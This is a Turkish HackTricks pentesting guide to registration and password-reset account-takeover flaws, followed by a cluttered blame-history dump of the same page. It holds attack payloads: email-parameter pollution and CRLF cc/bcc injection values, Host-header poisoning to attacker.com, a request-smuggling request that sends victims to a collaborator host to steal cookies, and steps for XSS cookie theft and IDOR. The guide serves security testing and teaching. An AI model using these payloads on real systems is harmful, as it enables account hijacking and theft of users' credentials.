hacktricks/pentesting-web/registration-vulnerabilities.md

# Kayıt ve Ele Geçirme Güvenlik Açıklıkları

<details>

<summary><strong>AWS hacklemeyi sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>

HackTricks'ı desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**] (https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [Discord grubuna katılın](https://discord.gg/hRep4RUj7f)** veya [telegram grubuna katılın](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'i takip edin.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.

</details>

### [WhiteIntel](https://whiteintel.io)

<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io), **dark web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.

WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.

Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:

{% embed url="https://whiteintel.io" %}

---

## Kayıt Ele Geçirme

### Çift Kayıt

* Var olan bir kullanıcı adı kullanarak oluşturmayı deneyin
* E-postayı değiştirerek kontrol edin:
* büyük harf
* \+1@
* e-postada nokta ekleyin
* e-posta adında özel karakterler (%00, %09, %20)
* E-postadan sonra siyah karakterler ekleyin: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com

### Kullanıcı Adı Sıralaması

Bir kullanıcı adının uygulama içinde zaten kaydedilip kaydedilmediğini anlamaya çalışın.

### Şifre Politikası

Kullanıcı oluştururken şifre politikasını kontrol edin (zayıf şifreler kullanıp kullanamayacağınızı kontrol edin).\
Bu durumda kimlik bilgilerini brute force deneyebilirsiniz.

### SQL Enjeksiyonu

[**Bu sayfayı kontrol edin**](sql-injection/#insert-statement) ve kayıt formlarında **SQL Enjeksiyonları** aracılığıyla hesap ele geçirmeyi veya bilgi çıkarmayı denemeyi öğrenin.

### Oauth Ele Geçirmeleri

{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}

### SAML Güvenlik Açıklıkları

{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
{% endcontent-ref %}

### E-posta Değiştirme

Kayıt olduktan sonra e-postayı değiştirmeyi deneyin ve bu değişikliğin doğru bir şekilde doğrulandığını veya rastgele e-postalara değiştirilebileceğini kontrol edin.

### Daha Fazla Kontrol

* **Tek kullanımlık e-postaları** kullanıp kullanamayacağınızı kontrol edin
* **Uzun** **şifre** (>200) **DoS**'a neden olur
* Hesap oluşturma üzerindeki **hız sınırlarını** kontrol edin
* username@**burp\_collab**.net kullanın ve **geri çağrıyı** analiz edin

## **Şifre Sıfırlama Ele Geçirmeleri**

### Referans Aracılığıyla Şifre Sıfırlama Jetonu Sızıntısı <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. E-posta adresinize şifre sıfırlama isteği gönderin
2. Şifre sıfırlama bağlantısına tıklayın
3. Şifreyi değiştirmeyin
4. Herhangi bir 3. taraf web sitesine tıklayın (örneğin: Facebook, twitter)
5. Burp Suite proxy'de isteği onaylayın
6. Referer başlığının şifre sıfırlama jetonunu sızdırıp sızdırmadığını kontrol edin.

### Şifre Sıfırlama Zehirlenmesi <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Burp Suite'de şifre sıfırlama isteğini onaylayın
2. Burp Suite'de aşağıdaki başlıkları ekleyin veya düzenleyin: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Değiştirilmiş başlıkla isteği yönlendirin\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. _host başlığına_ dayalı bir şifre sıfırlama URL'si arayın: `https://attacker.com/reset-password.php?token=TOKEN`

### E-posta Parametresi Aracılığıyla Şifre Sıfırlama <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### API Parametrelerinde IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>

1. Saldırgan kendi hesabıyla giriş yapmalı ve **Şifre Değiştir** özelliğine gitmelidir.
2. Burp Suite'u başlatın ve isteği Intercept edin.
3. İsteği tekrarlayıcı sekmesine gönderin ve parametreleri düzenleyin: Kullanıcı Kimliği/e-posta\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`

### Zayıf Şifre Sıfırlama Jetonu <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>

Şifre sıfırlama jetonu her seferinde rastgele oluşturulmalı ve benzersiz olmalıdır.\
Jetonun süresinin dolup dolmadığını veya her zaman aynı olup olmadığını belirlemeye çalışın, bazı durumlarda oluşturma algoritması zayıf olabilir ve tahmin edilebilir. Aşağıdaki değişkenler algoritma tarafından kullanılabilir.

* Zaman Damgası
* Kullanıcı Kimliği
* Kullanıcının E-postası
* Ad ve Soyad
* Doğum Tarihi
* Kriptografi
* Yalnızca Sayı
* Küçük jeton dizisi (karakterler arasında \[A-Z,a-z,0-9])
* Jeton yeniden kullanımı
* Jetonun son kullanma tarihi

### Şifre Sıfırlama Jetonunun Sızdırılması <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>

1. Belirli bir e-posta için API/UI kullanarak şifre sıfırlama isteği tetikleyin, örneğin: test@mail.com
2. Sunucu yanıtını inceleyin ve `resetToken` için kontrol edin
3. Ardından, jetonu aşağıdaki gibi bir URL'de kullanın: `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`

### Kullanıcı Adı Çakışması Yoluyla Şifre Sıfırlama <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>

1. Kurbanın kullanıcı adıyla aynı olan ancak kullanıcı adının önüne ve/veya arkasına boşluklar eklenmiş bir kullanıcı adıyla sistemde kayıt olun, örneğin: `"admin "`
2. Zararlı kullanıcı adınızla bir şifre sıfırlama isteği isteyin.
3. E-postanıza gönderilen jetonu kullanın ve kurbanın şifresini sıfırlayın.
4. Yeni şifre ile kurban hesabına bağlanın.

Platform CTFd bu saldırıya karşı savunmasızdı.\
Bkz: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)

### XSS Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>

1. Uygulama içinde veya çerezlerin üst alan etki alanına (`*.domain.com`) kapsandığı bir alt alan içinde XSS bulun.
2. Mevcut **oturum çerezini** sızdırın
3. Çerez kullanarak kullanıcı olarak kimlik doğrulayın

### HTTP İstek Kaçırma Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>

1\. Türde HTTP İstek Kaçırma (CL, TE, CL.TE) tespit etmek için **smuggler**'ı kullanın\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. `POST / HTTP/1.1`'i aşağıdaki verilerle üzerine yazacak bir istek oluşturun:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` hedef, kurbanları burpcollab'a yönlendirmek ve çerezlerini çalmaktır\
3\. Son istek aşağıdaki gibi olabilir
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X
```
### Hesap Ele Geçirme CSRF Aracılığıyla <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>

1. CSRF için bir payload oluşturun, örn: "Şifre değişikliği için otomatik gönderimli HTML formu"
2. Payload'u gönderin

### JWT Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>

JSON Web Token, bir kullanıcıyı doğrulamak için kullanılabilir.

* JWT'yi başka bir Kullanıcı Kimliği / E-posta ile düzenleyin
* Zayıf JWT imzasını kontrol edin

{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}

## Referanslar

* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)


### [WhiteIntel](https://whiteintel.io)

<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunar.

WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.

Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:

{% embed url="https://whiteintel.io" %}


<details>

<summary><strong>Sıfırdan Kahraman'a AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>

HackTricks'i desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io.peass) koleksiyonumuzdaki özel [**NFT'leri**](https://opensea.io/collection/the-peass-family) keşfedin
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.

</details>
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								# Kayıt ve Ele Geçirme Güvenlik Açıklıkları
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								<summary><strong>AWS hacklemeyi sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								HackTricks'ı desteklemenin diğer yolları:
-												a

											
										
										
											2024-02-03 14:45:32 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
 								* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**] (https://opensea.io/collection/the-peass-family) koleksiyonumuz
 								* **💬 [Discord grubuna katılın](https://discord.gg/hRep4RUj7f)** veya [telegram grubuna katılın](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'i takip edin.
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								### [WhiteIntel](https://whiteintel.io)
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								[**WhiteIntel**](https://whiteintel.io), **dark web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
 								Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
 								{% embed url="https://whiteintel.io" %}
 								---
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## Kayıt Ele Geçirme
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								### Çift Kayıt
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Var olan bir kullanıcı adı kullanarak oluşturmayı deneyin
 								* E-postayı değiştirerek kontrol edin:
 								* büyük harf
 								* \+1@
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								* e-postada nokta ekleyin
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* e-posta adında özel karakterler (%00, %09, %20)
 								* E-postadan sonra siyah karakterler ekleyin: `test@test.com a`
 								* victim@gmail.com@attacker.com
 								* victim@attacker.com@gmail.com
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								### Kullanıcı Adı Sıralaması
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								Bir kullanıcı adının uygulama içinde zaten kaydedilip kaydedilmediğini anlamaya çalışın.
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Şifre Politikası
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								Kullanıcı oluştururken şifre politikasını kontrol edin (zayıf şifreler kullanıp kullanamayacağınızı kontrol edin).\
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								Bu durumda kimlik bilgilerini brute force deneyebilirsiniz.
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### SQL Enjeksiyonu
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								[**Bu sayfayı kontrol edin**](sql-injection/#insert-statement) ve kayıt formlarında **SQL Enjeksiyonları** aracılığıyla hesap ele geçirmeyi veya bilgi çıkarmayı denemeyi öğrenin.
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Oauth Ele Geçirmeleri
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												GITBOOK-3788: No subject

											
										
										
											2023-02-16 18:26:56 +00:00
+								{% content-ref url="oauth-to-account-takeover.md" %}
 								[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% endcontent-ref %}
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								### SAML Güvenlik Açıklıkları
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="saml-attacks/" %}
 								[saml-attacks](saml-attacks/)
 								{% endcontent-ref %}
-												GitBook: [master] 7 pages and 2 assets modified
											
										
										
											2021-06-27 15:43:01 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### E-posta Değiştirme
-												GitBook: [master] 7 pages and 2 assets modified
											
										
										
											2021-06-27 15:43:01 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								Kayıt olduktan sonra e-postayı değiştirmeyi deneyin ve bu değişikliğin doğru bir şekilde doğrulandığını veya rastgele e-postalara değiştirilebileceğini kontrol edin.
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								### Daha Fazla Kontrol
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								* **Tek kullanımlık e-postaları** kullanıp kullanamayacağınızı kontrol edin
 								* **Uzun** **şifre** (>200) **DoS**'a neden olur
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								* Hesap oluşturma üzerindeki **hız sınırlarını** kontrol edin
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* username@**burp\_collab**.net kullanın ve **geri çağrıyı** analiz edin
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								## **Şifre Sıfırlama Ele Geçirmeleri**
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								### Referans Aracılığıyla Şifre Sıfırlama Jetonu Sızıntısı <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+. E-posta adresinize şifre sıfırlama isteği gönderin
 . Şifre sıfırlama bağlantısına tıklayın
 . Şifreyi değiştirmeyin
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+. Herhangi bir 3. taraf web sitesine tıklayın (örneğin: Facebook, twitter)
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+. Burp Suite proxy'de isteği onaylayın
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+. Referer başlığının şifre sıfırlama jetonunu sızdırıp sızdırmadığını kontrol edin.
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Şifre Sıfırlama Zehirlenmesi <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+. Burp Suite'de şifre sıfırlama isteğini onaylayın
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+. Burp Suite'de aşağıdaki başlıkları ekleyin veya düzenleyin: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
 . Değiştirilmiş başlıkla isteği yönlendirin\
 								`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
 . _host başlığına_ dayalı bir şifre sıfırlama URL'si arayın: `https://attacker.com/reset-password.php?token=TOKEN`
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### E-posta Parametresi Aracılığıyla Şifre Sıfırlama <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
+								```powershell
 								# parameter pollution
 								email=victim@mail.com&email=hacker@mail.com
 								# array of emails
 								{"email":["victim@mail.com","hacker@mail.com"]}
 								# carbon copy
 								email=victim@mail.com%0A%0Dcc:hacker@mail.com
 								email=victim@mail.com%0A%0Dbcc:hacker@mail.com
 								# separator
 								email=victim@mail.com,hacker@mail.com
 								email=victim@mail.com%20hacker@mail.com
 								email=victim@mail.com|hacker@mail.com
 								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### API Parametrelerinde IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+. Saldırgan kendi hesabıyla giriş yapmalı ve **Şifre Değiştir** özelliğine gitmelidir.
 . Burp Suite'u başlatın ve isteği Intercept edin.
 . İsteği tekrarlayıcı sekmesine gönderin ve parametreleri düzenleyin: Kullanıcı Kimliği/e-posta\
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Zayıf Şifre Sıfırlama Jetonu <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Şifre sıfırlama jetonu her seferinde rastgele oluşturulmalı ve benzersiz olmalıdır.\
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								Jetonun süresinin dolup dolmadığını veya her zaman aynı olup olmadığını belirlemeye çalışın, bazı durumlarda oluşturma algoritması zayıf olabilir ve tahmin edilebilir. Aşağıdaki değişkenler algoritma tarafından kullanılabilir.
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								* Zaman Damgası
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kullanıcı Kimliği
 								* Kullanıcının E-postası
 								* Ad ve Soyad
 								* Doğum Tarihi
 								* Kriptografi
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								* Yalnızca Sayı
 								* Küçük jeton dizisi (karakterler arasında \[A-Z,a-z,0-9])
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Jeton yeniden kullanımı
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								* Jetonun son kullanma tarihi
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								### Şifre Sıfırlama Jetonunun Sızdırılması <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+. Belirli bir e-posta için API/UI kullanarak şifre sıfırlama isteği tetikleyin, örneğin: test@mail.com
 . Sunucu yanıtını inceleyin ve `resetToken` için kontrol edin
 . Ardından, jetonu aşağıdaki gibi bir URL'de kullanın: `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								### Kullanıcı Adı Çakışması Yoluyla Şifre Sıfırlama <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+. Kurbanın kullanıcı adıyla aynı olan ancak kullanıcı adının önüne ve/veya arkasına boşluklar eklenmiş bir kullanıcı adıyla sistemde kayıt olun, örneğin: `"admin "`
 . Zararlı kullanıcı adınızla bir şifre sıfırlama isteği isteyin.
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+. E-postanıza gönderilen jetonu kullanın ve kurbanın şifresini sıfırlayın.
 . Yeni şifre ile kurban hesabına bağlanın.
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								Platform CTFd bu saldırıya karşı savunmasızdı.\
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bkz: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								### XSS Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+. Uygulama içinde veya çerezlerin üst alan etki alanına (`*.domain.com`) kapsandığı bir alt alan içinde XSS bulun.
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+. Mevcut **oturum çerezini** sızdırın
 . Çerez kullanarak kullanıcı olarak kimlik doğrulayın
-												GitBook: [#2870] update

											
										
										
